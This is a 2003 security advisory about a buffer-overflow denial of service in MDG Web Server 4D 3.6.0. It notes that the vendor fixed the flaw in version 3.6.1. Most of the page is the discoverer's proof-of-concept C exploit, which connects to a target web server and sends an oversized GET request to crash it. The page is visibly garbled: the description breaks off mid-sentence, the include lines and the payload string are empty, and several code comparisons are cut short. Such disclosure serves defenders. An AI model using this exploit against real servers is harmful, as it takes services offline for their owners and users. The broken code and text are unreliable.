Denial of Service (DoS) in MDG Web Server 4D Version 3.6.0

Reported April 30, 2003, by Tom Ferris.

 

 

VERSIONS AFFECTED

 

  • MDG Web Server 4D 3.6.0

 

DESCRIPTION

 

A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system. This vulnerability stems from a buffer-overflow condition. By issuing a GET / request with 4096 caret brackets (

 

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

/* Web Server 4D 3.6.0 DoS

 *

 * Vulnerable systems:

 * Web Server 4D 3.6.0 DoS

 * Vendor:

 * http://www.mdg.com/

 *

 * Download it here:

 * ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe

 *

 * Written and found by badpack3t

 * For SP Research Labs

 * 04/29/2003

 *

 * www.security-protocols.com

 *

 * usage:

 * sp-ws4d \[targetport\] (default is 80)

 */

 

#include

#include

 

#pragma comment(lib, "ws2_32.lib")

 

char exploit\[\] =

 

"GET /

"

"

"

"

"

"

 

 

int main(int argc, char *argv\[\])

\{

      WSADATA wsaData;

      WORD wVersionRequested;

      struct hostent          *pTarget;

      struct sockaddr_in      sock;

      char *target, buffer\[30000\];

      int port,bufsize;

      SOCKET mysocket;

     

      if (argc

      \{

            printf("Web Server 4D 3.6.0 DoS\r\n \r\n\r\n", argv\[0\]);

            printf("Tool Usage:\r\n %s \[targetport\] (default is 80)\r\n\r\n", argv\[0\]);

            printf("www.security-protocols.com\r\n\r\n", argv\[0\]);

            exit(1);

      \}

 

      wVersionRequested = MAKEWORD(1, 1);

      if (WSAStartup(wVersionRequested, &wsaData)

 

      target = argv\[1\];

 

      //for default web attacks

      port = 80;

 

      if (argc >= 3) port = atoi(argv\[2\]);

      bufsize = 512;

      if (argc >= 4) bufsize = atoi(argv\[3\]);

 

      mysocket = socket(AF_INET, SOCK_STREAM, 0);

      if(mysocket

INVALID_SOCKET)

      \{    

            printf("Socket error!\r\n");

            exit(1);

      \}

 

      printf("Resolving Hostnames...\n");

      if ((pTarget = gethostbyname(target)) NULL)

      \{

            printf("Resolve of %s failed\n", argv\[1\]);

            exit(1);

      \}

 

      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

      sock.sin_family = AF_INET;

      sock.sin_port = htons((USHORT)port);

 

      printf("Connecting...\n");

      if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))

      \{

            printf("Couldn't connect to host.\n");

            exit(1);

      \}

 

      printf("Connected!...\n");

      printf("Sending Payload...\n");

      if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)

      \{

            printf("Error Sending the Exploit Payload\r\n");

            closesocket(mysocket);

            exit(1);

      \}

 

      printf("Remote Webserver has been DoS'ed \r\n");

      closesocket(mysocket);

      WSACleanup();

      return 0;

\}

 

VENDOR RESPONSE

 

MDG has released version 3.6.1 of the product. The vendor reports that this version is no longer vulnerable.

 

CREDI

 

Discovered by Tom Ferris.

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish